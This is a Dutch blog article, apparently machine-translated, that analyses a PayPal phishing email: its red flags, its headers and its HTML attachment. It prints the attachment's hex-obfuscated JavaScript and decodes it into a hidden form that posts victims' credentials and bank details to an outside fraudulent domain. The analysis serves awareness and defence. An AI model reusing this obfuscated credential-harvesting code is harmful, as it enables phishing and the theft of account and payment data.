10Sep
In de wereld van vandaag waar alle informatie online is, is phishing een van de meest populaire en verwoestende online aanvallen, omdat je altijd een virus kunt opruimen, maar als je bankgegevens worden gestolen, zit je in de problemen. Hier is een analyse van een dergelijke aanval die we hebben ontvangen.
Denk niet dat het alleen maar uw bankgegevens zijn die belangrijk zijn. Immers, als iemand de controle over uw accountaanmelding verkrijgt, weten zij niet alleen de informatie in dat account, maar de kans is dat dezelfde inloggegevens op verschillende manieren kunnen worden gebruikt.andere accounts. En als ze uw e-mailaccount in gevaar brengen, kunnen ze al uw andere wachtwoorden opnieuw instellen.
Dus naast het houden van sterke en variërende wachtwoorden, moet je altijd op zoek naar valse e-mails die zich voordoen als het echte werk. Hoewel de meeste phishing-pogingen amateuristisch zijn, zijn sommige behoorlijk overtuigend, dus het is belangrijk om te begrijpen hoe ze op oppervlakteniveau kunnen worden herkend en hoe ze onder de motorkap werken.
Afbeelding door asirap
Onderzoek naar wat er in gewoon gezichtsvermogen is
Ons voorbeeldbericht, zoals de meeste phishing-pogingen, "informeert" u over activiteit op uw PayPal-rekening die, onder normale omstandigheden, alarmerend zou zijn. Dus de roep om actie is om uw account te verifiëren / herstellen door zo ongeveer elk stukje persoonlijke informatie in te dienen dat u maar kunt bedenken. Nogmaals, dit is een mooie formule.
Hoewel er zeker uitzonderingen zijn, wordt vrijwel elke phishing- en scam-e-mail rechtstreeks in het bericht met rode vlaggen geladen. Zelfs als de tekst overtuigend is, kun je meestal veel fouten vinden die door de hele berichttekst zijn verspreid, wat aangeeft dat het bericht niet legitiem is.
The Message Body
Op het eerste gezicht is dit een van de betere phishing-e-mails die ik heb gezien. Er zijn geen spelling- of grammaticale fouten en de woordenstroom is gebaseerd op wat u zou verwachten. Er zijn echter een paar rode vlaggen die u kunt zien als u de inhoud wat nauwkeuriger bekijkt.
- "Paypal" - De juiste situatie is "PayPal"( hoofdletter P).U kunt zien dat beide varianten in het bericht worden gebruikt. Bedrijven zijn zeer bewust met hun branding, dus het is twijfelachtig dat zoiets het proefproces zou doorstaan.
- "allow ActiveX" - Hoe vaak heb je een legitiem webbedrijf ter grootte van Paypal gezien dat een gepatenteerde component gebruikt die alleen in een enkele browser werkt, vooral als ze meerdere browsers ondersteunen? Zeker, ergens daarbuiten doet een bedrijf het, maar dit is een rode vlag.
- "veilig." - Merk op hoe dit woord niet in de marge staat met de rest van de alineatekst. Zelfs als ik het venster wat meer uitrek, wikkelt het niet goed in.
- "Paypal!" - De spatie vóór het uitroepteken ziet er vreemd uit. Gewoon een andere gril waarvan ik zeker weet dat die niet in een legitieme e-mail staat.
- "PayPal-rekening Update Form.pdf.htm" - Waarom zou Paypal een "PDF" bijvoegen, vooral wanneer ze gewoon naar een pagina op hun site kunnen linken? Waarom zouden ze bovendien proberen een HTML-bestand als een PDF te verbergen? Dit is de grootste rode vlag van allemaal.
De berichtkop
Wanneer u de berichtkop bekijkt, verschijnen er een aantal meer rode vlaggen:
- Het van-adres is [email protected].
- Het aan adres ontbreekt. Ik heb dit niet weggelaten, het is gewoon geen onderdeel van de standaard berichtkop. Meestal zal een bedrijf dat uw naam heeft, de e-mail aan u persoonlijk maken.
Het Attachment
Wanneer ik de bijlage open, kunt u onmiddellijk zien dat de lay-out niet correct is, omdat er stijlinformatie ontbreekt. Nogmaals, waarom zou PayPal een HTML-formulier e-mailen wanneer ze u gewoon een link op hun site kunnen geven?
Opmerking: hebben we daarvoor de ingebouwde HTML-attachmentviewer van Gmail gebruikt, maar we raden je aan om GEEN bijlagen van oplichters te OPENEN.Nooit. Ooit. Ze bevatten vaak exploits die trojaanse paarden op je pc installeren om je accountgegevens te stelen.
Als u nog wat verder scrolt, ziet u dat dit formulier niet alleen vraagt om onze PayPal-inloggegevens, maar ook om bank- en creditcardinformatie. Sommige afbeeldingen zijn verbroken.
Het is duidelijk dat deze phishing-poging met één klap op alles is gericht.
De technische analyse
Hoewel het vrij duidelijk moet zijn op basis van wat in het volle zicht is dat dit een phishing-poging is, gaan we nu de technische samenstelling van de e-mail oplossen en zien wat we kunnen vinden.
Informatie van het Attachment
Het eerste dat u moet bekijken, is de HTML-bron van het attachment-formulier dat de gegevens naar de nepsite stuurt.
Wanneer u de bron snel bekijkt, lijken alle koppelingen geldig als ze verwijzen naar "paypal.com" of "paypalobjects.com" die beide legitiem zijn.
Nu gaan we enkele basispaginagegevens bekijken die Firefox verzamelt op de pagina.
Zoals je kunt zien, zijn sommige grafische afbeeldingen afkomstig van de domeinen "blessedtobe.com", "goodhealthpharmacy.com" en "pic-upload.de" in plaats van de legitieme PayPal-domeinen.
Informatie van de e-mailheaders
Vervolgens zullen we de rauwe headers van e-mailberichten bekijken. Gmail maakt dit beschikbaar via de menuoptie Show Original van het bericht.
Als u naar de koptekstinformatie van het oorspronkelijke bericht kijkt, kunt u zien dat dit bericht is samengesteld met Outlook Express 6. Ik betwijfel of PayPal iemand heeft die deze berichten handmatig verzendt via een verouderde e-mailclient.
Nu we naar de routeringsinformatie kijken, kunnen we het IP-adres zien van zowel de afzender als de relayerende mailserver.
Het IP-adres van de "Gebruiker" is de originele afzender. Als u snel naar de IP-informatie opzoekt, zien we dat het IP-adres in Duitsland is.
En als we kijken naar de relaying mail server's( mail.itak.at), IP-adres kunnen we zien dat dit een ISP is in Oostenrijk. Ik betwijfel of PayPal hun e-mails rechtstreeks door een in Oostenrijk gevestigde internetprovider stuurt wanneer ze een enorme serverfarm hebben die deze taak gemakkelijk aankan.
Waar gaan de gegevens naartoe?
Dus we hebben duidelijk vastgesteld dat dit een phishing-e-mail is en wat informatie verzamelde over waar het bericht vandaan kwam, maar hoe zit het met de verzending van uw gegevens?
Om dit te zien, moeten we eerst de HTM-bijlage opslaan op onze desktop en openen in een teksteditor. Als u er doorheen scrolt, lijkt alles op orde te zijn, behalve wanneer we een verdacht uitziend Javascript-blok bereiken.
Als we de volledige bron van het laatste blok Javascript doorbreken, zien we:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; gelijk aan x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Telkens wanneer je een grote warboel ziet met schijnbaar willekeurige letters en cijfers ingebed in een Javascript-blok, is het meestal verdacht. Kijkend naar de code, wordt de variabele "x" ingesteld op deze grote reeks en vervolgens gedecodeerd in de variabele "y".Het uiteindelijke resultaat van de variabele "y" wordt vervolgens naar het document geschreven als HTML.
Sinds de grote reeks is gemaakt van cijfers 0-9 en de letters af, is het zeer waarschijnlijk gecodeerd via een eenvoudige ASCII naar Hex conversie:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
vertaalt:
& lt; form name =”main” id =”main”methode = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Het is geen toeval dat dit wordt omgezet in een geldige HTML-formuliertag die de resultaten niet naar PayPal verzendt, maar naar een frauduleuze site.
Bovendien, wanneer u de HTML-bron van het formulier bekijkt, ziet u dat deze formuliertag niet zichtbaar is omdat deze dynamisch wordt gegenereerd via Javascript. Dit is een slimme manier om te verbergen wat de HTML feitelijk doet, als iemand eenvoudig de gegenereerde bron van de bijlage zou bekijken( zoals we eerder deden) in tegenstelling tot het openen van de bijlage rechtstreeks in een teksteditor.
Als u een snelle whois op de betreffende site uitvoert, kunnen we zien dat dit een domein is dat wordt gehost bij een populaire webhost, 1and1.
Opvallend is dat het domein een leesbare naam gebruikt( in tegenstelling tot iets als "dfh3sjhskjhw.net") en het domein is geregistreerd voor 4 jaar. Daarom denk ik dat dit domein is gekaapt en als pion in deze phishing-poging is gebruikt.
Cynisme is een goede verdediging
Als het gaat om veilig online blijven, doet het nooit pijn om een goed beetje cynisme te hebben.
Hoewel ik er zeker van ben dat er meer rode vlaggetjes in het voorbeeld-e-mailbericht staan, zijn wat we hierboven hebben aangegeven indicatoren die we al na een paar minuten onderzoek zagen. Hypothetisch gezien, als de oppervlakte van de e-mail zijn legitieme tegenhanger 100% nabootste, zou de technische analyse nog steeds de ware aard ervan onthullen. Daarom is het belangrijk om te kunnen onderzoeken wat je wel en niet kunt zien.